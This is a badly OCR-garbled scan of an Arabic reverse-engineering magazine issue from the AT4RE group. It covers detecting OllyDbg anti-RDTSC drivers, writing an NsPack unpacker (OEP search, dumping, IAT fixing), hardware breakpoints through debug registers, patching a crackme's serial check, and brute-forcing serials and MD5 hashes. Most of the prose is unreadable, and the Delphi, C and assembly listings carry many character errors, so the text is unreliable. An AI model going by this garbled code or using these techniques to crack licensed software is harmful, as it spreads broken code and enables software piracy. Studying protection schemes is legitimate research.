.RDTSC ¿ji oca 
Advenced Plugin ¿Es ¿od anti_rdtsc.syss fakerdtsc.sys El Y 30d 24 dí 
de 30 


.RDTSCA 349 OllyDbg 
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. OllyDbg o 
. Delphi 7 o) 


: gas ó Advenced OllyDbg Plugin ci: ¿+ £3 RDTSCg217 3545 yardas 


Olly Advanced 1.26 Beta 12 


Buafixes Additional Options 
Additional Options 2 


Anti-Debug Anti-Debug 2 
- Debug Bits 
MÍ IsDebuggerPresent 
( NtGlobalFlag (not recommended) 
MÍ HeapFlags 
MA ForceFlags 


¿Ant-RDTSC [Driver-based)-——————, 


Enable 
ifethod 1 S Method 2 
- Protected Application Environment 


A SuspendThread 
A BlockInput 


-Dither 
MA Break on TLS Callback 


(7 Anti-Anti Hardware BP 


Anti-RDTSC(Driver-based)- 3123 Enable S*lh 


' OnClick  OnCreate sa? ¿bid yy), ¿yaa ea ita gara 


3 


UB 5095 Register 
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CALL 


DWORD PTR 
DWORD PTR 
pdas 
CALL 


DWORD PTR 
DWORD PTR 
DWORD 
AE 


A 


MOV DWORD PTR DS:[456C04],EAX 


JU 1 


pe 
CALL 


DWORD PTR 
DWORD PTR 
Pa 
CALL 


DWORD 
DWORD 
DWORD PTR 
DWORD PTR 
DWORD 
AS, 


a ay ll ao lll 


SS: [EBP-4] 
SS: [EBP-8] 


PTR SS: [EBP-4] 
PTR SS: [EBP-8] 
55: [EBP-4] 
SS: [EBP-8] 
PTR SS: [EBP-4] 


SS: [EBP-4] 
SS: [EBP-8] 


PTR SS: [EBP-4] 
PTR SS: [EBP-8] 
SS: [EBP-4] 
SS: [EBP-8] 
PTR SS: [EBP-4] 


laredo e 


Register y dejara Pda 5? ja RDTSC EA bald yb use pi 
00456C08 : 5% 


ESi alós yd job ue, dl aóa jur md 
DTSC dz 


E E A SY 


anti_rdtsc.sys y fakerdtsc.sys 531 485, eléulas Y 


program AdvancedOllyDbg; 


uses 
windows, SysUtils; 
const 
DRIVER INFORMATION = 11; 
fakerdtsc = 'fFakerdisc.sys' ; 
anti _rdtsc = "anti, rdtsc.sys"; 
type 
TPDWord = “DWORD; 
TDriverlnfo = packed record 


Address: Pointer; 
Size: DWORD; 
Unknown2: DWORD; 
EntryIndex: DWORD; 
Unknown4: DWORD; 
Name: array[0..MAX PATH + 3] of Char; 
end; 
var 
ZwQuerySystemInformation: function(infoClass: DWORD; 
buffer: Pointer; 
bufSize: DWORD; 
returnSize: TPDword): DWORD; stdcall = nil; 
procedure GetDriverlnfo; 
var 
temp, Index, numBytes, numEntries: DWORD; 
buf: TPDword; 
driverlnfo: *TDriverInfo; 
Result: string; 
begin 
if (ZwQuerySystemInformation = nil then 
ZwQuerySystemInformation := GetProcAddress (GetModuleHandle ('ntdl11.d11'), 
'"ZwQuerySystemInformation'); 
ZwQuerySystemInformation(DRIVER INFORMATION, (temp, 0, (numBytes); 
buf := AllocMem(numBytes * 2); 
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SS Iniclocdogí 


ZwQuerySystemInformation(DRIVER INFORMATION, buf, numBytes * 2, (numBytes); 


numEntries := buf”; 
driverInfo := Pointer (DWORD(buf) + 12); 
for Index := 1 to numEntries do 
begin 
esta ¿= ExtractFileName (driverinto”.Name) ; 


TEN es Urales) or (Result Ranirc]s e) Ehen 
MessageBoxA(0, '[Sucess] OllyDbg Detected'+13''+13'STRELiTZIA | 
AT4RE'$13'www.at4re.com'+13'011yDbg Advanced Anti-RDTSC Driver Detection', 
'Suescss" y Ma 0%) 


e 10) 


Inc (driverInfo); 
end; 
Delete size 
FreeMem (buf) ; 
end; 
begin 
GetDriverIlnfo; 
end. 


Ce nalal 
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: MSDNLibrarycialót bas do ez: 


Ey , Le = .s Ea ñ an eos Ñ 
a 7 Aya adsl a JU iy £la LT GUA ZwQuensysteminformation E au ja E 


NTSTATUS WINAPIZwQuerySysteminformation( 
in SYSTEM_INFORMATION_CLASS SystemInformationClass, 


__in_out  PVOIDSysteminformation, 


4 ULONG SysteminformationLength, 


lijar 5 E cin 


__out_opt  PULONGReturnLength 
VE 
Remarks 


The ZwQuerySysteminformation function and the structures that it returns are internal to the operating system and 
subject to change from one release of Windows to another. To maintain the compatibility of your application, ¡t is better 
to use the alternate functions previously mentioned instead. 


If you do use ZwQuerySystemInformation, access the function through run-time dynamic linking. This gives your code an 
opportunity to respond gracefully if the function has been changed or removed from the operating system. Signature 
changes, however, may not be detectable. 


This function has no associated import library. You must use the LoadLibrary and GetProcAddress functions to 
dynamically link to Ntdll.dll. 
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(Result = fakerdtsc) (Result = anti rdtsc) 

MessageBoxA(0, '[Sucess] OllyDbg Detected'+413''413'STRELiTZIA | 
AT4RE'$13'www.at4re.com'+13'011yDbg Advanced Anti-RDTSC Driver Detection', 
'Sucess', MB OK); 
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DWORD S: [EBP-4] 
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DWORD PTR : CEBP-10] 


DWORD PTR : [EBP-107 
DWORD PTR SS: [EBP-C] 


DWORD PTR SS: [EBP-C] 


DWORD PTR 


MessageBoxA 
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Sucess O 


[Sucess] OllyDbg Detected 
STRELITZIA | AT4RE 


wen atáre.com 
Advanced Olly Driver Detection - 40DD Trick 
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engine unpack 33 1304 2 ¿yaDll dra ego s ogábályació : 


Debugger.dll (O 
Importer.dll. (O 
Dumper.dll (Y 
REALIGN.DLL () 
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¿bare aria alo y aya do: 


1 ¿curas 2 IMP OEP jo pa pai ri ja 000 3 eva, 


¿DEP JMP-2E 2 shyady:, 3)2 


Uceda e ada dos e Jul do 0EP des Cog a Debugger==¿ SÍ6L )3 


JA ys LOs ya y ¿lija Quay y ES dog lus ¿OEP Creá pe ESTA Aya ita Dump AS 


¿oa ¿q ¿alATa Algo lA Ta Lobo pabál y Ca Viga EA, 


ai ly Uca lps 2009 (232 H—— 


ld logs aa les oagz: ATARE lares t 


abál Sue Apex ds zu" je Nspack . 
: OllyDhg cl LL del) a 

90 

60 
00496CB6 Es 00000000 keygel 
00496CBB 5D POP EBP 
DO496CBC S3ED 07 SUB EBP,? 
OD496CBF| 8D8D 24FCFFFF LEA ECX, DWORD PTA SS: [EBP-9DC] 
00496CC5| 8039 01 CMP BYTE PTR DS: [ECX],1 
anilarana anna ¿nana ana "o caniaraia 


CS? Jaja Jae lO je loop loop aba MP SES SST U00496F26 


D0496F1C Bs 01000000 MOV EAX,1l 


00496F21 cz o0coo oc 
DO496F2Z4 6l POPAD 
00496F25 39D POPFD 


DO496F26 


E9 4D56FCFF 
00496F2B| SBB5 BOFBFFFF MOV ESI, 
D00496F31 OBF6 OR ESI,ESI 


00496F33|,, 0F84 97000000 JE 
00496F39| 8B95 BSFBFFFF MOV EDX,DWOR [ 8 


20 táye 
39 326 Unpacker FIA Ca 
áLílo se 


as jos tala) Mspack | 


deco else Unpacker «iy 


SE, 


calle: 


procedure TForml.BitBtn2Click(Sender: TObject); 


all Bu ls ud caJado ¡pat 2009 33 ) 


laredo e 


¡SJMPOEP 33)» 
ón ja lag ads je 


ue ge arras god ase ls) E99D61 
procedure TForml.BitBtn2Click(Sender: TObject); 
var 
NSPSignaturel :array[1..10] of BYTE; 
WildCard : Integer; 
FoundPattern,SearchSize:Integer; 
begin 
if FileExists(Editl.Text) then begin 
ImageBase := 0; 
FoundPattern := 0; 
WildCard := 0; 


NSPSignaturel[1] := : //NsPack signature 
NSPSignaturel[2] := ; 
NSPSignaturel[3] := > 


Due gue ju + ImageBase usó ¿OEP Packed 


e 
InitDebug 


ad , 


//initialize the debugging by calling the InitDebug API 


ProcessInfo := 

InitDebug(PChar (Edit1.Text),'', PChar (ExtractFilePath(Editl.Text))); QQ 
ListBoxl1.Items.Add('Creating process...'); 
ListBoxl1.Items.Add('Searching for NsPack pattern...'); 


FoundPattern := Find(PackedO0EP,1000,GNSPSignaturel,3,fWildCard) ; (2) 


if FoundPattern > 0 then begin 
//In this suspended state call SetBpx to set the main 
//breakpoint at OEP 
SetBpx (FoundPattern+2,bpxSingle,tOEP_ JUMP); 
ListBox1.Items.Add('Setting BPX at: ' + IntTWHes(FoundPattern+2,8)); 
istBoxitttens Add (> UNpackingiNsPack vs) 
//To get the debugging process to this point you 
//must call the DebugLo PI 

DebugLoop () ; (A 


end 


else begin 

ListBox1.Items.Add('File is not packed with NsPack...'); 
StopDebug () ; 

DebugLoop () ; 

ListBoxl.Items.Add ('Unpacking terminated...'); 


end; 


al ly 0d zado lll 2009 


ld logs aa les oagz: ATARE lacus t 


end; 
end; 


E 


1 399820000 InitDebug 33 22) y dicas já, a OllyDbg 302" ¿2 Debugger += duya ze 4 


. suspended state 


ad 


nl AQ OEP JMP ¿2 033 da lio ds sul pa za Su, ¿o et 


ya 


ES 
3222 00496F24 3004 FoundPattern- vero dl ideas 1 2 al 3 ¿Ónbdds ODA96F26 
2100031072 JMP 


DO0496F1A 61 POPAD 
00496F1B 9D POPFD 
DO496F1C B3 01000000 MOV EAx,1l 
DO496F21 C2 0C00 oc 
DO496FZa 61 POPAD 


DO49EFZ5| 9D POPFD 
00496F26|- ES 4DSGFCFF |IMP 
DO496F2 SBB5 BOFEFFFF|MOV ESI, 
00496F31 OBF6 OR ESI,ESI 


0OD496FZ4 aéMviú0< "40000 
D0496F34 TA ADO > 
D0496F44 uOf-0.uO0f-0.uDéz 
00496F54 <7D00 ¿SRVDOD%0 + 
D0496F64 Of5.WO=*TúDO_Z[f” 
DD496F74 -1Y. OÓDODO>$505 3 


00496F34 DOfú.uOFé?*< ¡DúURS 


Glp jés gram dais 


aby 0 U calado ll pal 2009 


ld lus ad loe gasz: ATARE 


deal co 


UC 


GetContextData(rElP); 
= OEP + 1; 
ProcessInfo”; 
ReadProcessMemoryF 


0) 
0) 
hProcess 
ReadOk 


P 


al 


” 
Pp, 


if ReadO0k = True then begin 
OEP OEP buffer + 4; 
Forml.ListBoxl1.Items.Add (' 


//dump the debugged process 
DumpProcess (hProcess,ImageB 
Forml.ListBox1.Items.Adad(' 


//IMPREC 


Md ts 


e es e e sl L A ds A 
al ET ¿Y la oc yaimilzió 3 IN 


callback 


A 


y 


laredo e 


ixed (hProcess,OEP,ftbuffer,1,fNumberOfBytesRead) ; 


=> OEP is: ' + IntToHex(0 
with DumpProcess 

ase, PChar (DumpTo) ,OEP) ; 

=> Dumping process'); 


EP,8)); 


ImporterAutoSearchIAT (PChar (DumpTo) ,ImageBase,FirstSectionVA,NTSizeOfImage,LIATSt 


art,eIATSize); 
Forml.ListBox1.Items.Add (' 


=> Searching for IAT'); 


ImporterAutoFixIAT(hProcess,PChar (DumpTo) ,ImageBase,IATStart,IATSize,1); 
=> Fixing IAT'); 


Forml.ListBox1.Items.Ada(' 


Aya 0192 ]MP OEP 
$02 J00496F26 oo 


ft da Ad 
] 9D 
- E9 BDS6FCFF 


2BB5 BOFBFFFF 
OBF6 
DFS4 27000000 


mov 


D00496F3 


D0496F39 8B95 BSFEFFFF 
00496F3F D3FZ ADD 
00496F41 833E 00 cup 
004396F44|,. 75 OE 

D0496F46 837E 04 00 CMP 
00496F4A|, 75 08 

nn4añRFan 227 na an FMP 


8 ay ul dao lll 


OR ESI,ESI 


o IS 
MOV EDX, 


ESI,EDX 
DWORD PTR DS: [ESI],0 


DWORD PTR DS: [ESI+4],0 


DINAR PTR DS- TRST+2A1 fi 


ESP 
EBP 
ESI 
EDI 


DO12FFEO 
Xx ?7C90EB94 ntdll.KiFa 
IX 7?FFD6ODO 


DO1Z2FFC4 
DO12FFFO 
FFFFFFFF 


7C910 


ntdll. 70910 


en. 0049 


Iwo 
=y 


laredo e 


D1D EUpLy 1 ULLULULLULUULUUUL 
00496F75 


00496F77 


ST? empty 1.000000000000 


4020 Cond 1000 
J OZ7?F Prec NEAR,5S3 


DO1ZFFC4 

SMVBD: y" úDDOO,,— | OO12FFCS 

00496F36|00 00 00 8B|935 * 000 f>.un| DO1Z2FFCC 
00496F46|83 7É 04 o00Í75 os 83 3 SElf-D0.00f-D0.uléz 0012FFDO 
00496561038 03 DA 53l|5 3/00 ¿S2v000%20-0$ 0012FFD4 
00496F66|c6 0c 57 FF|os 5 5 W0=TúDO_ Z1f”.t DOLAAEDB 
00496F76|59 89 85 CO Y. .0000>$500530 DOL2FFDC 
00436F86|83 F9 00 75|03 O|f$t.unre>< ¡Durspe |, | 9012FFEO 
nñn1?>TTTA 


Js duel G Destination Jmp He 20% ¿Mago : 


Destination = JMP Offset + Program Counter + 4 


IX 34 Offset ]MP ¿0 ¿200 FFFC564D «IJUV 5301 Óeas 
add po job sho" st g00496F27 « she ór i J ve ¿dE ue: ReadProcessMemonyFixed 


0% Gades 11 2 22 0EP doi 


222-Counter programa ¿o ssigidas 0 rsstuzoJMP OEP 3 E céctsdoo-ElP Sut 


4 


002 H3h 


¿ud? tulo; pla y: 


Destination = FFFC564D + 00496F26 + 4 = 10045C574 + 4= 10045C578 


ado) bo dy ¿ads 00450578 45 59 ¿2 0EP 


proa LY sl Dump dog laos a 0 md e OEP az da El 
dut D , 


% LN Jo ¡a2hyaibie juga ge go Unpacker 26-415. Y JE, 9 Ecos y és MoleBox 3: 
abbr ya, 


palio ag zoo Unpacker pos agnagiónia 


all Bu lruslUzJad ¡pat 2009 (37 ) 


A AS O TS 


MoleBox Pro 2.3.0 


Executano O | 


Packto | pl 


Packages 
Selectpackage Default Package (executable 


SA! lil ió 


Ansó jo ds ¿o MoleBox 4 Lis 
Edgy hilo e ÓEA Release 


aio 0 U cada do lll 2009 


ld lus ad loe gasz: ATARE JA ud. ú do de 6 a iclvedonz 


Hanqling Debug Kegisters 


So ole E jyaDebuggerir ri e cios rl 
Hardware Breakpoints 


Logo) ap alí ya an, 


006 ano aya e yo y Fes g Ze ( Breakpoints Hardware 
Debug Registers Piña e cr rl aa Eopyios 
32 bit ¿9Mogg damas: 


DIOR a ar gtUroo del z0ó a ¿ed 
Dr4-Dr5 : Í3 3 Ugo ¿op tasca, 
ries O HWBP dE. deroiad jar tod alió DebugStatusRegisteria1% 340% :Dr6 


Register Control Debug O a Dr 


a ly 00 Ja Iboga 2009 


laredo e 


lbs leg as az Ives osz: ATARE JA ud) (Es JETS de $ 


348 Jyo(0<7) 0tabcocae pas esos ral gl qua y, 397 (O 
Oáthread 22 MoProcess  -¿ckDebugexception — -¿lólocal breakpoint 1 blima jad, 

QDr733 de 
ci 300 vazub ¿Ómdebug exception $0 Jh(G) ag) ¡0 aigul ¿ga breakpointglobal 
processes «+57 


R/W3 : 52 R/WO4 


GERÓS yl, ¿O jainilib  zo ral arde des gore 33d juga d gb ocu ds y) od 


mas (ud) 


¿Dl gd AJO ro ia rl 
AS coje ee eo. 
:10) 08 5 dad MÍ ue (ego), 


NE AN 


LEN3: +LENO4> 
Ge0d Lara ro) eos 0 jaigal jóo ye, dae hs (Ja 


:10bañj je aber cie Li 8 jad 


a 


) AMD) 35 INTEL- 5 ya2£ documentations-é ss Cóaluá de 


8 ay ul ao lll 


Ivi sel leg as vato Ives aso: ATARE la iclvedonz 


e E gabe dt eoas? 


2 Process¿ y? o) 
Ads a gue! O 


ea 19d E ji uedebugger £ Se J'Sdebug e jo Pé crackme pao 330 y 
Esdió pios 34s. 
flags == ¿UNE júx 39 CreateProcess ya) ias a Y da CO a e ds al 


DEBUG_PROCESS.. 


exception 30as 30 Eo ira 


25 win32api EAT Rex ¿coa qu 


WaitForDebugEvent - GetThreadContext - SetThreadContext - Read/WriteProcessMemory 


ójlluón eussqosróndó há y EXCEPTION SINGLE_STEP/ 562% eq exception 0 ¿26 HWBPE só» 
exception code «e handling Íy» += 0%, 


diolj ad  suwBraral yea ds Esdlat 


¿nas JE sj apiz alt yedio! 


all ly 00 ¿Ja llo pat 2009 


laredo e 


1 3 
”" 


Aya ¿ 


e ebodó joya reas: 


ET 


31 161514131211109876543210 


DR6 


Ss HWBPALoN GS 
[de 


Sedo 4 adll ya ¿pnl Drx 


€ SetThreadContext vag bye 


BOOL WINAPI SetThreadContext( 
__in HANDLE hThread, 
_ in const CONTEXT* IpContext 


); 


ouyahandlello Jai sure”) ll contextk 
adllcontext 1 4 structure sd) >45lpContext : 


INE EA 


Es process 22 Py uthread 4 Ó595 E yajs: $ Multithreading 
thread ¿aid ályo bdo su 3906. 


ThreadScheduling s5threads-Z ¿1 ho Sh0á 53 Kernel Dispatcher-2J¿0Ó 222 a só 


vda cu) vá - storage areas .. Ga - yaliog( 546 2 5 VY a 5lthread swap-out Ds (s» 
aby 31384 00 20 E RE 


edo, ESOS Ayartco ray có Ata, $0? 
z Context 35 Thread Context-22) 


ME 
a UA CONTEXT strcuture-22 Jomób 
struct ( 


DWORD ContextFlags; 


IR 


a ay ul dao lll 


ld leas ed loeSgasz: ATARE laredo e 


// This section is specified/returned if CONTEXT_DEBUG_REGISTERS is 
// set in ContextFlags. Note that CONTEXT_DEBUG_REGISTERS is NOT 
// included in CONTEXT_FULL. 

LR 

DWORD  Dro0; 

DWORD Drl1; 

DWORD Dr2; 

DWORD Dr3; 

DWORD  Dré6; 

DWORD Dr7; 


LE 

// This section is specified/returned if the 

// ContextFlags word contians the flag CONTEXT_FLOATING_POINT, 
14 

FLOATING_SAVE AREA FloatSave; 


FL 
// This section is specified/returned if the 
// ContextFlags word contians the flag CONTEXT_SEGMENTS. 


DWORD SegGs; 
DWORD SegFs; 
DWORD SegEs; 
DWORD SegDs; 


Ed 

// This section is specified/returned if the 

// ContextFlags word contians the flag CONTEXT_INTEGER. 
LL 

DWORD — Edi; 

DWORD — Esi; 

DWORD  Ebx; 

DWORD  Edx; 

DWORD ECX; 

DWORD Eax; 


HL 

// This section is specified/returned if the 

// ContextFlags word contians the flag CONTEXT_CONTROL. 
LL 

DWORD  Ebp; 

DWORD Eip; 

DWORD SegCs; // MUST BE SANITIZED 

DWORD EFlags; // MUST BE SANITIZED 

DWORD Esp; 

DWORD SegSs; 


1/ 
// This section is specified/returned if the ContextFlags word 
// contains the flag CONTEXT_EXTENDED_REGISTERS. 
// The format and contexts are processor specific 
eL 
BYTE ExtendedRegisters [MAXIMUM SUPPORTED EXTENSION]; 
) CONTEXT; 


db yb 0 la roo zo strcuture 


28 23 080 dado lb 2009 


ld logs aa Ives oagz: ATARE loirluecdorsz 


a e d oy ns: 


GetThreadContext .¿ Jl 37h ¿ye context) la 
ES SÓ Dr 351) guna lapa Jo 2 MBR 33590, 
Dr0->Dr3.90* ds yalicho Ja HWBP ym 8) 72 


0000 


SetThreadContext vagón 36h, yaró Ms contextp¿ ZO 


Era oa le dl o 


bool SetHWBP(HANDLE hThread, unsigned int linearAddress, int type, int length, 
int count) 


1 


CONTEXT context = (CONTEXT _ALL|CONTEXT DEBUG_REGISTERS); 
DR7 dr7; 


if (GetThreadContext (hThread, $context)) 


1 
dr7 = *(DR7*)£context.Dr7; 


switch (count) 


1 
Case 0: 
1 
context.Dr0 = linearAddress; 
dr7.HWBP0_MODE = HWBP_LOCAL; 
dr7.HWBPO_LENGTH = length; 
dr7.HWBP0O_ACCESS = type; 
break; 
Y; 
Case 1: 
1 
context.Dr1l = linearAddress; 
dr7.HWBP1_MODE = HWBP_LOCAL; 
dr7.HWBP1_ LENGTH = length; 
dr7.HWBP1_ACCESS = type; 
break; 
d; 
Case 2: 
1 
context.Dr2 = linearAddress; 
dr7.HWBP2_MODE = HWBP_LOCAL; 
dr7.HWBP2_LENGTH = length; 
dr7.HWBP2_ACCESS = type; 
break; 
y; 
Case 3: 
1 
context.Dr3 = linearAddress; 
dr7.HWBP3_MODE = HWBP_LOCAL; 
dr7.HWBP3_LENGTH = length; 
dr7.HWBP3_ACCESS = type; 
break; 
Y; 
default: 


return false; 


all ly 00 ao lll 2009 


ys 


lab lus ad loe gasz: ATARE RA TAS 


ds 

context.Dr7 = *(PDWORD) £dr7 ; 

return SetThreadContext (hThread, $context); 
y; 


return false; 


520 HWBP y ñocgjaós oo abit edi janlocal boi testigos: 


bool RemoveHWBP(HANDLE hThread, int count) 
1 
CONTEXT context = [CONTEXT _ALL|CONTEXT DEBUG_REGISTERS); 
DR7 dr7; 
if (GetThreadContext (hThread, $context)) 
e 
dr7 = *(DR7*)£context.Dr7; 
switch (count) 
1 
Case 0: 
1 
context.Dr0 = 0; 
dr7.HWBP0_MODE = 0; 
break; 
y; 
Case 1: 
1 
context.Drl = 0; 
dr7.HWBP1_MODE = 0; 
break; 
d; 
Case 2: 
1 
context.Dr2 = 0; 
dr7.HWBP2_MODE = 0; 
break; 
Y; 
Case 3: 
1 
context.Dr3 = 0; 
dr7.HWBP3_MODE = 0; 
break; 
y; 
default 
return false; 
y; 
context.Dr7 = *(PDWORD) ¿dr7; 
return SetThreadContext (hThread, $context); 
d; 
return false; 
y; 
and ad ¿5Dr7í calle Ja ajó: 
A 
struct ( 


all ly 0 zado lll 2009 


lab lus ad loe gasz: ATARE liclvedorz 
ULONG HWBPO_MODE 3208 
ULONG HWBP1_MODE ZO 
ULONG HWBP2_MODE ZA 
ULONG HWBP3_MODE AE 
ULONG E ALI 
ULONG GE Sale 
ULONG _ unused 307 
ULONG HWBP0_ACCESS ESE 
ULONG HWBPO_LENGTH ZAS 
ULONG HWBP1_ACCESS Ez 
ULONG HWBP1_LENGTH AE 
ULONG HWBP2_ACCESS A 
ULONG HWBP2_ LENGTH Eze 
ULONG HWBP3 ACCESS 327 
ULONG HWBP3_LENGTH 0 
DE 


¿oca " Y 3yY Es 2 


se 


ESGE jabo Suya, 


00403FE9 CALL 00403E60 
00403FEE MOV EDX,dword ptr [ebp - 208] > good serial 
00403FF4 POP EAX 
00403FF5 CALL 00402F58 
00403FFA JE SHORT 00404011 > magic Jump 
00403FFC PUSH O 
00403FFE PUSH 00404050 
00404003 PUSH 004040DC 
00404008 PUSH 0 
0040400A CALL <JMP. £user32.MessageBoxA> > badboy msg 
0040400F JMP SHORT 00404024 
00404011 PUSH 0 
00404013 PUSH 00404050 
00404018 PUSH 00404100 
0040401D PUSH O 
0040401F CALL <JMP. ¿user32.MessageBoxA> > goodboy msg 
00404024 XOR EAX, EAX 
al aa Jue do aya: 


al ly 00 Ja Iboga 2009 


lab lus ad loe gasz: ATARE la iclvedonz 


3 1yabsdl execution sE" ge GOX00A03FFA 30 lt 57 0 ¿oda uo testo O 

90 ¿bodó, edx 

ES E SO 
¿yacióedx» yGetThreadContextad ¿Us? Jas dro escort 0 ga eb 


process» $4 ¿Hue ReadProcessMemory ¿4157 MI ¿po có ¿a 


4 Sao HWBP 62 42 20 SUE EFLAGS 29ó62 yor EQ 327F da dez ¿bo sia ye o) 


Elo 
aula 2 ua, 


AG EFLAGS 301 cor dto tizo-level bitoinias J óstructure + 


STTUEE 
ULONG Cl SL 
ULONG _  unusedO sales 
ULONG PF 8 dL o 
ULONG _ Uunusedl Suba 
ULONG AF 84 
ULONG unused2 gdl a 
ULONG ZE :1; 
ULONG sF LS 
ULONG TF gd, 
ULONG dde S: dls 
ULONG DF Sp 
ULONG OF 3: dLs 
ULONG TOPL Ze 
ULONG _ unused3 Sie 
ULONG REF Sp 
ULONG VM gg 
ULONG AC 8 Jl 
ULONG NE Lo 
ULONG NIP o 
ULONG ID 3. dl £ 
ULONG unused4 sL0)g 
JEFLAGS; 


AA él Cs e aja JC aliyja (a o 


cx D¡Documents and 


uggee created. 


Pp good rial 
-—--> hadboy message hypassed successfully 


dll sip ol 
paziarodl pol 
xj GamingMasteR 
yg” Jasa! 03), 
al) Col euro email pd) ¿go 111111111111 


|] visa vo añ ] [spa > 


ai Uca lps 2009 


lab lus ad loe gasz: ATARE JA ud. ú do de 6 a iclvedonz 


lao la] ly e ja lada y 9 le a gs 


Findins Serial With brute Force Attack 


310197 taguecjó ¿caló SN 
.charset GA 


GOA dd, ja Jl A A JS Blog? ¿es? ¿se Force Brute 


.) e o IE 
Oo (004 co ¿oO o: 


MO) 
gli y) puela lado, 10) 
Ly 1 6 06 US 0 O 


Introduction ToBrute Force Attack “¿sg use: Mes e Vóyeló Il 


ao zoe): bol ja edo og o: 
Haval, Tiger,... 


MD5, SHA, 


dobla: as 310 E )ATIRE( 894 pe Ga MD cage qui jo jo: 


AFA75974BD93160D55DFC4214655E55A 


aldo; ¡Su roya bolo Eon jua y CU 00 CET 004 ¿ucááya juzo Sua MD5 
ya ET Seo: EN] !! 


al ly 00 Ja Iboga 2009 


leg legs mz lus UA gZ: ATARE WwedVsz 


alvags 
FO EL a miso 0 dl, 


¿aja q gh MEN c04 as ya ab sh Ed Eon 26olJó ma a 


, e A 
AS O al LES 3yh ol a) 


ea, 


da esti ai ajo al oo jon! 


ayi ali! ue NU Das 


AD MDS ¿$305 

40,9) 30 5h) 20 ala: 
failed O 

(dota Ae): al ilia jo a áliga d O 


abcdefghijklmnopgqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 


br Lu ¿ 


lb ó ch don: ayala bi ella 


¿br ólici jatliocl lolia s IE AE RUS E OR 
¿gia Uy ataca jp lo 
iia md dea % 352 100 aby po Sia JU y alt; le Coda ale ul Jo, nh 
3h: 


«La 


Ja, 


ETE qu OS E SP E 


AY 90 503 ¿opa 
cíJik 


Cog da : 


Letter 1 Letter 2 Letter 3 Letter 4 Letter 5 
a a a a a 
b b b b b 
A 
B B B B B 
1 1 1 1 1 
2 2 2 2 2 


a y el dao lll 2009 


lab lees ad loe gasz: ATARE a iclvedonz 


pos 


EN E EY AOS 


yo $ 30 ip xd 30 ip x 30 ip xl 30 ip xd 
alba y » 
aaaaa, aaaab, aaaac, ...... aaaba, aaabb,aaabc, ...... : vado? yajab 9) 3 


Ao Lo: COn ¿llas 33 dgya ly ados SECAS 3 546 $ adenda bald 62 ssl ya 5 


:6215=916,132,832 7) 


AA A A AT 


yy Baja GU te 


co 


. s y ” e E . . 
ata Sa: RainbowCrack, Cain 


1, 


E EAS . 


¿9 aa tds era ¿eps OS e js pazo gu : 


World List ( Using By Hackers, Name:Pass) U) 
Rainbow Tables ( For Hash) e 


:) Brute Force Attack ¿Ss? ESE E 

ds Ela Qi ye dijo le jale coo gas yal VEIcE As E yy y lala so já / Ñ 
¿dl a ej gio Gal q, ¿jo | (39) 

Ej O 


Code Analysis  3egl: 


al ly 00 ¿Ja Iboga 2009 


lab lus ad loe gasz: ATARE Wwe EdVsz 
o 
(A ES OÍ 
dl 


, s 


09 0 Eo 


o pupa cho 55 El 3 sy BZ dove alles dy 
O ¿Sa 3la : Roben + goods: 1234 


ya al? : O 


D0453F28 | PUSH EBP 


) aja te ol :O 


yaa full yo 


Las gu Jyb dy Lio 


21 Ly Jiy dl Job 4 Lis 


orrect Input ...." 


39, ¡estao sd Udo lJogi dez y jádal) o iS. O 


ARA FADAR a z z 
00453FC2 m ye JUL y JaYl aja ás 


sx 


DAD A 


UJY dun, 1d ) ad 23 390 abel 2) yo 


¿allogios (F7) 10) 


ab iy ly 90) ¿dado lla! 2009 251 


loba leg as ito Ives aso: ATARE 


D0453D60 


£ £ 
Javi ojil ua 


AE E 


puño dl ajLidl yes 


c— ¿lalo yo: B5 
Roben > Robe > Rb > R=52 hex, b= 62 hex,+1>B5 


aa ¿ars csátajo y ¿co ron de 390 abdó AT 


coRsarrO A viso Jl Lelogd y pl go esIgd y ya 


UY du, palas y gabi có) yoo a: 
A E Y A: 


ES 


paso ui «Lidl 


Cool ce: 0 


Roben > Robe > oe > o=6F hex,e = 65 hex,+ 1>D5 


o d 0 ye ¿el 3 E 5 a ¿gaMD5 


Jos El 


00453FEB Er PPP úl Ao 


ai ly Uca lps 2009 


ly cues d 


z 
luja1 ás 


Jo 


232 


lab lus ad loe gasz: ATARE Wwe EdVsz 


A AO) 


D00453E8 J a A E 


DO453E85 


(ASCII dafO0l62 E "03 


Ss 


SUD 
00454014 


II "1234D5") 


44 oz álJogis dez ly euodón q ¿ea Su) 123405 : lo) 


00454020 


D453EF5 


7 1% KN] sh $ aye broma $ MA ld 10) 
Mya E Su 


ai ly Uca Lp 2009 


lab lus ad loe gasz: ATARE Wwe EdVsz 


¿lo yy doy lily dilo 


SF. 0040436C 


00454054 


YSL sg ad ys dar desd ño ly 


E io SÍ a5LS 151 Loss Jgnidl des doy lio 


ASCIT " [ Success ] Valid Serial ... 


"F47ABC?ISEF42ZFO1SDFFDDC? 


ts 3d aálz.) Y 99% 9923 Fa dal qoálla(as ECO 


car jay ez je, pu )2 3 yislsál pega y ta 
ya 
)3 Elyéals 3 MOS (áslyald io) 30 li, 


* 


SS E E 


A E 0% y SE 5 EE e] S , 
TGD 


JO Ases $MDS (Sly 


sl y Syb as ja 


3 


daa o Ay ya zE Mya, 


e) oo qe A Ñoa 2% E 
CO ZOO jmyaibloljards adoluds PE y 


.) Brute Force Attack( Yaño 


ai ls Uca Lp 2009 


Ivi sel leg as vato Ives aso: ATARE Wwe EdVrsz 


A gala labo] Lacias 0d yal? Lado Forcer Brute 


he alla! yo ol Ja aya dia Wezóy 9 ilisja E nu ¿o ¿oh ja ¿Lady 


Sed ql gy o ad GOA: 


uigar dióyarzal) 10) 
Lx clio EVA 1 ls ye E e ya de 3 7) LS 


3 


E ¿ch ja ut: 3? Oya 
LAS eÑ rl Cásya el e 20 e e jo Ja Mal jay ¿oye y ua by ye ad yal > dl Gl 


, d also lila, 
Lis ¿isa y jun ¿Fuelya Grial 2 


o] 
o) 


as 


ua euro eya pánO daa país AN kg ió e 


tuto lod ¿ezo elojii 1 ábideya a 


oli! Úrya Er) ¡ye a ye due) ¿ua ss ¿da ya (e ya 


Sali? 


¿yábtimoyajág jgddón py 94 jp ) ¿a ja aja ja ja cdi, 


EE 


QuEv, Pjtasua sé ¿cal ROS 
«charset 0 


ai ly Uca lps 2009 ss H—— 


lab lees ad loe gasz: ATARE JA ud. ú do de $ 


laredo e 


ELRCE Anti s AI do lg 


Gia! Mazo ó teu: las GU ado Me sar 0 Sia Esad dl 54 Ys 0 sos, lo 0) “Uylog 
